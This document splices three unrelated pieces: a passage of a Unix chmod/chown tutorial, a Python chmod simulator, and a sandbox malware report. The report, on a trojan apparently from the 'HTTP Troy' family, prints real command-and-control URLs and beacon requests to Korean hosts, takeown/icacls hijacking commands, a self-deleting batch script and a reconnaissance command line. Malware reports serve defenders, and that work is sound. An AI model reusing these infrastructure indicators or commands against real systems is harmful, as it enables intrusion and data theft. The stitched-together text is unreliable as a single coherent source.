$ chmod g=rx testfile
$ ls -l testfile
-rw-r-xrwx  1 amrood   users 1024  Nov 2 00:10  testfile

Here's how you can combine these commands on a single line:

$ chmod o+wx,u-x,g=rx testfile
$ ls -l testfile
-rw-r-xrwx  1 amrood   users 1024  Nov 2 00:10  testfile

Using chmod with Absolute Permissions

The second way to modify permissions with the chmod command is to use a number to specify each set of permissions for the file. Each permission is assigned a value, as the following table shows, and the total of each set of permissions provides a number for that set.
Number  Octal Permission Representation                             Ref
0       No permission                                               ---
1       Execute permission                                          --x
2       Write permission                                            -w-
3       Execute and write permission: 1 (execute) + 2 (write) = 3   -wx
4       Read permission                                             r--
5       Read and execute permission: 4 (read) + 1 (execute) = 5     r-x
6       Read and write permission: 4 (read) + 2 (write) = 6         rw-
7       All permissions: 4 (read) + 2 (write) + 1 (execute) = 7     rwx

Here's an example using the testfile. Running ls -l on the testfile shows that the file's permissions are as follows:

$ ls -l testfile
-rwxrwxr--  1 amrood   users 1024  Nov 2 00:10  testfile

Then each example chmod command from the preceding table is run on the testfile, followed by ls -l, so you can see the permission changes:

$ chmod 755 testfile
$ ls -l testfile
-rwxr-xr-x  1 amrood   users 1024  Nov 2 00:10  testfile
$ chmod 743 testfile
$ ls -l testfile
-rwxr---wx  1 amrood   users 1024  Nov 2 00:10  testfile
$ chmod 043 testfile
$ ls -l testfile
----r---wx  1 amrood   users 1024  Nov 2 00:10  testfile

Changing Owners and Groups

While creating an account on Unix, it assigns an owner ID and a group ID to each user. All the permissions mentioned above are also assigned based on the Owner and the Groups. Two commands are available to change the owner and the group of files:

chown: The chown command stands for "change owner" and is used to change the owner of a file.
chgrp: The chgrp command stands for "change group" and is used to change the group of a file.

Changing Ownership

The chown command changes the ownership of a file. The basic syntax is as follows:

$ chown user filelist

The value of the user can be either the name of a user on the system or the user id (uid) of a user on the system. The following example will help you understand the concept:

$ chown amrood testfile
$

This changes the owner of the given file to the user amrood.
NOTE: The super user, root, has the unrestricted capability to change the ownership of any file, but normal users can change the ownership of only those files that they own.

Changing Group Ownership

The chgrp command changes the group ownership of a file. The basic syntax is as follows:

$ chgrp group filelist

The value of group can be the name of a group on the system or the group ID (GID) of a group on the system. The following example helps you understand the concept:

$ chgrp special testfile
$

This changes the group of the given file to the special group.

SUID and SGID File Permission

Often when a command is executed, it will have to be executed with special privileges in order to accomplish its task. As an example, when you change your password with the passwd command, your new password is stored in the file /etc/shadow.

As a regular user, you do not have read or write access to this file for security reasons, but when you change your password, you need to have the write permission to this file. This means that the passwd program has to give you additional permissions so that you can write to the file /etc/shadow.

Additional permissions are given to programs via a mechanism known as the Set User ID (SUID) and Set Group ID (SGID) bits. When you execute a program that has the SUID bit enabled, you inherit the permissions of that program's owner. Programs that do not have the SUID bit set are run with the permissions of the user who started the program.

This is the case with SGID as well. Normally, programs execute with your group permissions, but instead your group will be changed just for this program to the group owner of the program.

The SUID and SGID bits will appear as the letter "s" if the permission is available. The SUID "s" bit will be located in the permission bits where the owner's execute permission normally resides.
For example, the command:

$ ls -l /usr/bin/passwd
-r-sr-xr-x  1   root   bin  19031 Feb 7 13:47  /usr/bin/passwd*
$

shows that the SUID bit is set and that the command is owned by the root. A capital letter S in the execute position instead of a lowercase s indicates that the execute bit is not set.

If the sticky bit is enabled on the directory, files can only be removed if you are one of the following users:

The owner of the sticky directory
The owner of the file being removed
The super user, root

To set the SUID and SGID bits for any directory try the following command:

$ chmod ug+s dirname
$ ls -l
drwsr-sr-x 2 root root  4096 Jun 19 06:45 dirname
$

© Copyright 2019. All Rights Reserved.
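The chmod section above walks through one symbolic transcript, three absolute modes and a single ug+s example. The Python below is an added example, not Tutorialspoint's code: it implements the general symbolic grammar (who letters ugoa, operators + - =, permission letters rwxst), absolute octal modes, and the ls -l rendering including the s/S and t/T forms the text describes, and replays the page's testfile transcript on plain integers so no file system is touched. Two simplifications are assumed: umask is ignored for clauses without a who letter, and the special bits change only when s or t is named explicitly.

```python
"""Simulate chmod symbolic/absolute modes and ls -l rendering on plain ints.

Added example, not Tutorialspoint's code. Simplifications: umask is ignored
for clauses without a who letter, and the special bits change only when
's' or 't' is named explicitly.
"""
import re
import stat

CLAUSE = re.compile(r"^([ugoa]*)([+\-=])([rwxst]*)$")
SHIFT = {"u": 6, "g": 3, "o": 0}                      # bit offset of each class's rwx
SPECIAL = {"u": stat.S_ISUID, "g": stat.S_ISGID, "o": stat.S_ISVTX}

def parse_mode(mode_str, current=0):
    """Apply a chmod mode string to `current` and return the new numeric mode."""
    if re.fullmatch(r"[0-7]{3,4}", mode_str):
        return int(mode_str, 8)                       # absolute mode replaces everything
    mode = current
    for clause in mode_str.split(","):                # chmod applies clauses left to right
        m = CLAUSE.match(clause.replace(" ", ""))
        if not m:
            raise ValueError(f"bad chmod clause: {clause!r}")
        who, op, perms = m.groups()
        classes = "ugo" if not who or "a" in who else [c for c in "ugo" if c in who]
        bits = 0
        for c in classes:
            if "r" in perms: bits |= 4 << SHIFT[c]
            if "w" in perms: bits |= 2 << SHIFT[c]
            if "x" in perms: bits |= 1 << SHIFT[c]
            if "s" in perms and c in "ug": bits |= SPECIAL[c]
        if "t" in perms:
            bits |= stat.S_ISVTX                      # the sticky bit is not per class
        if op == "+":
            mode |= bits
        elif op == "-":
            mode &= ~bits
        else:                                         # '=' replaces the class's rwx
            clear = sum(7 << SHIFT[c] for c in classes)
            mode = (mode & ~clear) | bits
    return mode

def render(mode, is_dir=False):
    """Render a numeric mode as the 10-character field shown by ls -l."""
    out = ["d" if is_dir else "-"]
    for c in "ugo":
        out.append("r" if mode & (4 << SHIFT[c]) else "-")
        out.append("w" if mode & (2 << SHIFT[c]) else "-")
        x = bool(mode & (1 << SHIFT[c]))
        if mode & SPECIAL[c]:
            letter = "t" if c == "o" else "s"         # s/t with x set, S/T without
            out.append(letter if x else letter.upper())
        else:
            out.append("x" if x else "-")
    return "".join(out)

def from_string(field):
    """Inverse of render(): parse an ls -l mode field (type character included)."""
    mode = 0
    for i, c in enumerate("ugo"):
        r, w, x = field[1 + 3 * i:4 + 3 * i]
        if r == "r": mode |= 4 << SHIFT[c]
        if w == "w": mode |= 2 << SHIFT[c]
        if x in "xst": mode |= 1 << SHIFT[c]          # lower-case s/t imply x
        if x in "sStT": mode |= SPECIAL[c]
    return mode

def octal(mode):
    """Octal string of the permission bits, as chmod's absolute form takes it."""
    return format(mode & 0o7777, "o")

if __name__ == "__main__":
    mode = from_string("-rwxrwxr--")                  # the page's testfile
    for step in ("o+wx", "u-x", "g=rx"):
        mode = parse_mode(step, mode)
        print(f"chmod {step:6} -> {render(mode)}  ({octal(mode)})")
    print("chmod 743      ->", render(parse_mode("743")))
    print("chmod ug+s dir ->", render(parse_mode("ug+s", 0o755), is_dir=True))
```

Feeding the page's transcript through parse_mode reproduces its output line for line (o+wx, u-x and g=rx take -rwxrwxr-- to -rw-r-xrwx, i.e. 657), and the same function handles the cases the text only mentions: a SUID file without the execute bit renders as rwS, and +t on a 777 directory renders as drwxrwxrwt.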
Hybrid Analysis report: c9b65b764985dfd7a11d3faf599c56b8

Verdict: malicious. Threat Score: 100/100. AV Detection: 68%. Labeled as: MemScan:Trojan.Generic.
This report is generated from a file or URL submitted to this webservice on June 12th 2018 01:20:26 (CEST).
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1. Report generated by Falcon Sandbox v8.10 © Hybrid Analysis.

Incident Response / Risk Assessment
Persistence: Grants permissions using icacls (DACL modification); Injects into explorer; Injects into remote processes; Spawns a lot of processes; Tries to take ownership of files; Writes data to a remote process.
Network Behavior: Contacts 1 domain and 1 host.

Indicators (not all malicious and suspicious indicators are displayed in the public report)

Malicious Indicators (17; 3 hidden)
Environment Awareness: The input sample contains a known anti-VM trick.
External Systems: Detected Suricata Alert; Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines; Sample was identified as malicious by a large number of Antivirus engines; Sample was identified as malicious by at least one Antivirus engine.
General: The analysis extracted a file that was identified as malicious; The analysis spawned a process that was identified as malicious.
Installation/Persistance: Allocates virtual memory in a remote process; Injects into explorer; Injects into remote processes; Writes data to a remote process.
Pattern Matching: YARA signature match.
System Security: Modifies the access control lists of files.
Unusual Characteristics: Spawns a lot of processes.

Suspicious Indicators (21; 1 hidden)
Anti-Detection/Stealthyness: Contains ability to open/control a service; Queries process information.
Anti-Reverse Engineering: PE file has unusual entropy sections; PE file is packed with UPX.
Cryptographic Related: Found a cryptographic related string.
Environment Awareness: Contains ability to query CPU information.
External Systems: Found an IP/URL artifact that was identified as malicious by at least one reputation engine.
General: Contains ability to find and load resources of a specific module.
Installation/Persistance: Contains ability to create a remote thread (often used for process injection); Contains ability to write to a remote process; Creates new processes; Drops executable files.
Spyware/Information Retrieval: Contains ability to enumerate processes/modules/threads.
System Destruction: Marks file for deletion; Opens file with deletion access rights.
System Security: Grants permissions using icacls (DACL modification); Tries to take ownership of files.
Unusual Characteristics: CRC value set in PE header does not match actual value; Entrypoint in PE header is within an uncommon section; Imports suspicious APIs.

Informative (30)
Anti-Reverse Engineering: Contains ability to register a top-level exception handler (often used as anti-debugging trick); PE file contains zero-size sections.
Environment Awareness: Contains ability to query machine time; Contains ability to query the machine version; Contains ability to query the system locale; Makes a code branch decision directly after an API that is environment aware; Reads the active computer name; Tries to sleep for a long time (more than two minutes).
General: Contacts domains; Contacts server; Contains PDB pathways; Creates a writable file in a temporary directory; Creates mutants; GETs files from a webserver; Launches a browser; Process launched with changed environment; Runs shell commands; Spawns new processes; Tries to GET non-existent files from a webserver.
Installation/Persistance: Connects to LPC ports; Dropped files; Modifies auto-execute functionality by setting/creating a value in the registry; Monitors specific registry key for changes; Opens the MountPointManager (often used to detect additional infection locations); Touches files in the Windows directory.
Network Related: Found potential URL in binary/memory; HTTP request contains Base64 encoded artifacts.
Unusual Characteristics: Installs hooks/patches the running process; Matched Compiler/Packer signature; Reads information about supported languages.

File Details
Filename: c9b65b764985dfd7a11d3faf599c56b8
Size: 305KiB (312320 bytes)
Type: peexe executable
Description: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Architecture: WINDOWS
SHA256: ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d
Compiler/Packer: UPX v1.25 (Delphi) Stub
Resources Language: KOREAN
Classification (TrID): 42.3% (.EXE) UPX compressed Win32 Executable; 36.7% (.EXE) Win32 EXE Yoda's Crypter; 9.1% (.DLL) Win32 Dynamic Link Library (generic); 6.2% (.EXE) Win32 Executable (generic); 2.7% (.EXE) Generic Win/DOS Executable
File Compositions / Imported Objects: 1 .OBJ Files (COFF) linked with LINK.EXE 10.10 (Visual Studio 2010) (build: 30319); 1 .RES Files linked with CVTRES.EXE 10.00 (Visual Studio 2010) (build: 30319); 1 .CPP Files (with LTCG) compiled with CL.EXE 16.00 (Visual Studio 2010) (build: 30319)

File Sections
Name   Entropy        Virtual Address  Virtual Size  Raw Size  MD5
UPX0   0              0x1000           0x22d000      0x0       d41d8cd98f00b204e9800998ecf8427e
UPX1   7.9309190833   0x22e000         0x4c000       0x4ba00   fafee9506c2cb7606718693156703f67
.rsrc  4.06720567587  0x27a000         0x1000        0x600     80e9f3854461573cdd5ef15498a07fd4

File Imports: ADVAPI32.dll, KERNEL32.DLL (RegCloseKey)

Processes (analysed 10 processes in total)
c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) 46/66
~ER1AFA.tmp (PID: 2080) 43/53
explorer.exe (PID: 1468)
sysprep.exe  "%WINDIR%\System32\sysprep\sysprep.exe" " (PID: 3272)
cmd.exe  /c takeown /f "%WINDIR%\system32\msimg64.dll" && icacls "%WINDIR%\system32\msimg64.dll" /grant administrators:F (PID: 2272)
takeown.exe  takeown /f "%WINDIR%\system32\msimg64.dll" (PID: 2396)
icacls.exe  icacls "%WINDIR%\system32\msimg64.dll" /grant administrators:F (PID: 2596)
iexplore.exe  www.google.com (PID: 2096)
iexplore.exe  SCODEF:2096 CREDAT:79873 (PID: 2672)
cmd.exe  cmd /c d.bat (PID: 2832)

Network Analysis

DNS Requests
Domain: solarshade.co.kr; Address: 221.143.46.43 (TTL: 179); Registrar: Megazone (http://HOSTING.KR); Name Server: ns1.hosting.co.kr; Creation Date: Sat, 14 Jan 2017 00:00:00 GMT; Country: Korea, Republic of

Contacted Hosts
221.143.46.43  80/TCP  iexplore.exe (PID: 2096)  Korea, Republic of

HTTP Traffic (endpoint 221.143.46.43:80, solarshade.co.kr; each request answered 404 Not Found)
GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 HTTP/1.1
GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 HTTP/1.1
GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: solarshade.co.kr

Suricata Alerts (ET rules applied using Suricata)
221.143.46.43:80 (TCP)  A Network Trojan was detected  CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET Request  SID 181303201 (3 occurrences)
221.143.46.43:80 (TCP)  3 further alerts whose category and SID are hidden in the public report (additional ETPro rules)

Extracted Strings
All Strings (1399), Interesting (357). Sources: c9b65b764985dfd7a11d3faf599c56b8.exe.bin (272), ~ER1AFA.tmp:2080 (889), screen_0.png (11), ~ER24B7.tmp.2200803788 (2), cmd.exe (2), PCAP (8), sysprep.exe:3272 (42), setupact.log (7), c9b65b764985dfd7a11d3faf599c56b8.exe:2084 (22), ud.bat (8), ~13785.tmp (9), diagwrn.xml (34), diagerr.xml (3), iexplore.exe:2096 (65), takeown.exe:2396 (6), w7e2219.tmp.362704492 (3), network.pcap (8), ~ER1AFA.tmp.3895635532 (1), icacls.exe (1), explorer.exe:1468 (2), iexplore.exe (2), takeown.exe (1), setuperr.log (1)
!"#$%&'()*+,-./0
"%WINDIR%\System32\sysprep\sysprep.exe" "
$.6 ~]\HTTP T.y %d.%d.%d.%d:%d %s ------> %s
%s is installed successfully.
%s\cmd.exe /c %s
%s\mscorp.exe
%s\msimg64.dll
%sPhysical Address. . . . . .
. . . : %sIP Address. . . . . . . . . . . . : %sSubnet Mask . . . . . . . . . . . : %sDefault Gateway . . . . . . . . . : %sDhcp Enabled. . . . . . . . . . . : %d ******************* ""ERROR!"" code: [%d] *************** , msimg64.dll - unexpected heap error - unexpected multithread lock error -----------------------------7d414e351603faContent-Disposition: form-data; name=""no""1-----------------------------7d414e351603faContent-Disposition: form-data; name=""id""%s-----------------------------7d414e351603faContent-Disposition: -----------------------------7d414e351603faContent-Disposition: form-data; name=""no""1-----------------------------7d414e351603faContent-Disposition: form-data; name=""id""%s-----------------------------7d414e351603faContent-Disposition: form-data; name=""sn""%d-----------------------------7d414e351603faContent-Disposition: form-data; name=""sc""%s-----------------------------7d414e351603fa-- -----------------------------7d414e351603faContent-Disposition: form-data; name=""upfile""; filename=""title.gif""Content-Type: application/octet-stream .?AV__non_rtti_object@std@@ .?AVbad_alloc@std@@ .?AVbad_cast@std@@ .?AVbad_exception@std@@ .?AVbad_typeid@std@@ .?AVCRemoteMemory@W7EUtils@@ .?AVCTempResource@W7EUtils@@ .?AVexception@std@@ .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ .a)0s^U!i! /c takeown /f ""%WINDIR%\\system32\\msimg64.dll"" && icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. 
It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 2- floating point support not loaded 2-9W2&:7:=:l: 2018-06-12 01:21:31, Error [0x0f0053] SYSPRP ValidateUser:User does not have required privileges to sysprep machine[gle=0x00000006] 2018-06-12 01:21:31, Error [0x0f00a1] SYSPRP WinMain: User must be an administrator.[gle=0x00000006] 2018-06-12 01:21:31, Info SYSPRP === Beginning of a new sysprep run === 2018-06-12 01:21:31, Info SYSPRP ======================================================== 2018-06-12 01:21:31, Info [0x0f004d] SYSPRP The time is now 2018-06-12 01:21:31 2018-06-12 01:21:31, Info [0x0f004e] SYSPRP Initialized SysPrep log at %WINDIR%\\System32\\sysprep\\Panther 3- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX true P true PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX true PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX The requested URL /eml/goods_list_ok.php was not found on this server.
@%windir%\\System32\\ieframe.dll,-12385 @%WINDIR%\\System32\\ieframe.dll,-12385 @%windir%\\System32\\ieframe.dll.mui,-12385 @%WINDIR%\\System32\\ieframe.dll.mui,-12385 @echo off:startif not exist ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe"" goto donedel ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe""del /AH ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe""goto start:donedel %0 [General]Version = %sinterval=%dWakeup time = 20%02d:%d:%dModule Path = %s[WWW]%s \\RPC Control\\console-0x000008E8-lpc-handle \\RPC Control\\console-0x00000F9C-lpc-handle \\Sessions\\1\\Windows\\ApiPort \\sys.bat \\System32\\sysprep\\CRYPTBASE.dll \\ThemeApiPort `\\??\\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963} `\\??\\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963} `local static destructor helper' `local static guard' `local static thread guard' `local vftable constructor closure' `local vftable' ating point support not loaded bad compressed size Base Class Descriptor at ( %PROGRAMFILES%\\(x86)\\Internet Explorer\\iexplore.exe %PROGRAMFILES%\\Internet Explorer\\iexplore.exe %PROGRAMFILES%\\Internet Explorer\\iexplore.exe www.google.com %TEMP%\\~ER1AFA.tmp %WINDIR%\\System32\\sysprep %WINDIR%\\System32\\sysprep\\CRYPTBASE.dll %WINDIR%\\System32\\sysprep\\sysprep.exe Caller: can only get memory of a memory zipfile Caller: there was a previous error Cannot save value into registry. Class Hierarchy Descriptor' CMB.... 
cmd /c d.bat cmd /c date /t >> ""%s"" & time /t >> ""%s"" & ipconfig /all >> ""%s"" & netstat -an >> ""%s"" cmd.exe /c takeown /f ""%s"" && icacls ""%s"" /grant administrators:F CoCreateInstance CoGetObject CompatibilityFlags Complete Object Locator' ComputerName Content-Type: multipart/form-data; boundary=---------------------------7d414e351603fa ControlService CorExitProcess Couldn't open process CreatePipe CreateProcessA CreateProcessAsUserA CreateRemoteThread credssp.dll, msimg64.dll CryptDestroyKey CryptImportKey d heap error DefaultConnectionSettings del ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe"" del /AH ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe"" DependOnService Description DisableLocalOverride DOMAIN error ected heap error ected multithread lock error Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} empt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. EnumServicesStatusExA EnumSystemLocalesA error Error code: %d Error Code: %d Error code: %d Error reading file Error writing to file ERROR_ACCESS_DENIED(We probably tried to inject into an elevated processwhich isn't allowed unless we're also elevated.Pick an unelevated process.) ExitProcess explorer.exe Failed to allocate memory Failed to join the new channel ""%s"". Failed to part the channel ""%s"". Maybe the channel is not existed. 
FlsGetValue FullScreen GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr GetACP GetActiveWindow GetAdaptersInfo GetCommandLineA GetCommandLineW GetComputerNameA GetConsoleCP GetConsoleMode GetConsoleWindow GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThread GetCurrentThreadId GetDesktopWindow GetDriveTypeA GetEnvironmentStrings GetEnvironmentStringsW GetFileAttributesA GetFileInformationByHandle GetFileSize GetFileTime GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetLocaleInfoW GetLocalTime GetModuleFileNameA GetModuleFileNameW GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetStartupInfoW GetStdHandle GetStringTypeA GetStringTypeW GetSystemDirectoryA GetSystemTimeAsFileTime GetTcpTable GetTempFileNameA GetTempFileNameW GetTempPathA GetTempPathW GetTickCount GetTokenInformation GetUdpTable GetUserDefaultLCID GetUserObjectInformationA GetUserObjectInformationW GetVersion GetVersionExA GetWindowsDirectoryA HeapSetInformation HTTP/1.1 404 Not FoundDate: Mon, 11 Jun 2018 23:51:46 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 HTTP/1.1 404 Not FoundDate: Mon, 11 Jun 2018 23:52:07 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 HTTP/1.1 404 Not FoundDate: Mon, 11 Jun 2018 23:52:28 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 I will sleep until 20%02d:%d:%d. Bye.. icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F IETldDllVersionHigh IETldDllVersionLow IETldVersionHigh IETldVersionLow iexplore.exe if not exist ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe"" goto done InfoTip InstallDate insufficient lookahead int support not loaded Invalid irc_errno value IsProcessorFeaturePresent IsValidLocale IsWow64Process loating point support not loaded Local LocalizedName LocalRedirectOnly LookupPrivilegeValueA ltithread lock error Microsoft Corporation Certificate Description. Microsoft Visual C++ Runtime Library Mozilla/4.0 (compatible; MSIE 6.0; Win32) mscoree.dll msimg64.dll NG error ntime Error!Program: o.pdbm1V OpenProcess OpenProcessToken OpenServiceA opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u output buffer too small for in-memory compression PidService Display Name======================= portuguese-brazilian Process32First Process32FirstW Process32Next Process32NextW ProtoLocal AddressForeign AddressState qrstuvwxyz[\\]^_`?{|}~ R6002- floating point support not loaded R6017- unexpected multithread lock error R6018- unexpected heap error R6032- not enough space for locale information R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information. 
rchy Descriptor' RegCloseKey RegCreateKeyExA RegDeleteValueA RegEnumKeyExA RegEnumValueA RegisteredOrganization RegisteredOwner RegOpenKeyExA RegQueryInfoKeyA RegQueryValueExA RegSetValueExA ReleaseMutex RSADecrypt - CryptImportKey RSAEncrypt - CryptImportKey RtlLookupFunctionEntry runtime error Runtime Error!Program: S^""Content-Type: application/octet-stream S^-----------------------------7d414e351603fa-- S^-----------------------------7d414e351603faContent-Disposition: form-data; name="" S^-----------------------------7d414e351603faContent-Disposition: form-data; name="" S^[ %d.%d.%d %d:%d:%d ] S^bind S^Content-Type: multipart/form-data; boundary=---------------------------7d414e351603fa S^Could not accept new connection S^gethostbyname S^gethostname S^getpeername S^getsockname S^http://lawbookcenter.co.kr/shop/temp/goods_list.php S^http://solarshade.co.kr/eml/goods_list_ok.php S^http=http://%s S^HttpAddRequestHeadersA S^HttpEndRequestA S^HttpOpenRequestA S^HttpQueryInfoA S^HttpSendRequestA S^HttpSendRequestExA S^InternetGetConnectedState S^IPv6 not supported S^IRC session terminated S^listen S^Mozilla/4.0 (compatible; MSIE 6.0; Win32) S^No error S^POST S^Read error S^Remote connection closed S^Socket error S^SOFTWARE\\Microsoft\\Internet Explorer\\Config\\Package S^SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion S^Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComputerDescriptions S^Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings S^Timeout error S^Write error S^WSAGetLastError searchindexer.exe Service Requested is already running. ServiceDll SetLastError ShellExecuteExW SHGetFolderPathW SING error solarshade.co.kr ssembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">true P StartServiceA sysprep\\sysprep.exe takeown /f ""%WINDIR%\\system32\\msimg64.dll"" TCP%-24s%-24sLISTENING ted multithread lock error TerminateProcess ThemeApiConnectionRequest There is no any started Win32 Services. There is no such a Service. 
This application has requested the Runtime to terminate it in an unusual way.Please contact the application's support team for more information. TLOSS error TlsGetValue Type Descriptor' ud.bat unexpected heap error uS2!SbS@!G2!1 Version wild scan winlogon.exe WriteProcessMemory www.google.com xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882" xmlns:rs="urn:schemas-microsoft-com:rowset" %SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP Troy\HttpDr0pper\Win32\Release\3PayloadDll.pdb %SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP Troy\HttpDr0pper\Win32\Release\HttpSecurityProvider.pdb %SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP Troy\HttpDr0pper\x64\Release\3PayloadDll.pdb %SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP Troy\HttpDr0pper\x64\Release\HttpSecurityProvider.pdb Zip-bug: an internal error during flation Zip-bug: internal initialisation not completed {09477111-DE61-43CD-A5AA-D9F7B489301F} {B4365893-6E19-11E8-989D-0A00278A626A} 2018-06-12 01:21:31, Error [0x0f0053] SYSPRP ValidateUser:User does not have required privileges to sysprep machine[gle=0x00000006]2018-06-12 01:21:31, Error [0x0f00a1] SYSPRP WinMain: User must be an administrator.[gle=0x00000006] 2018-06-12 01:21:31, Info SYSPRP ========================================================2018-06-12 01:21:31, Info SYSPRP === Beginning of a new sysprep run ===2018-06-12 01:21:31, Info SYSPRP ========================================================2018-06-12 01:21:31, Info [0x0f004d] SYSPRP The time is now 2018-06-12 01:21:312018-06-12 01:21:31, Info [0x0f004e] SYSPRP Initialized SysPrep log at %WINDIR%\System32\sysprep\Panther2018-06-12 01:21:31, Error [0x0f0053] SYSPRP ValidateUser:User does not have required privileges to sysprep machine[gle=0x00000006]2018-06-12 01:21:31, Error [0x0f00a1] SYSPRP WinMain: User must be an administrator.[gle=0x00000006]
Extracted Files Displaying 12 extracted file(s). The remaining 4 file(s) are available in the full version and XML/JSON reports.
Malicious3
w7e2219.tmp Size 529KiB (541696 bytes) Type pedll executable Description PE32 executable (DLL) (GUI) Intel 80386, for MS Windows AV Scan Result Labeled as "Gen:ExplorerHijack.Hu4@aWQ@tkgO" (51/65) Runtime Process ~ER1AFA.tmp (PID: 2080) MD5 c95cfec9d538250f94e696138ecd6ab2 SHA1 421877621db7788691dad7b05ed4978d83a74a0a SHA256 f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c
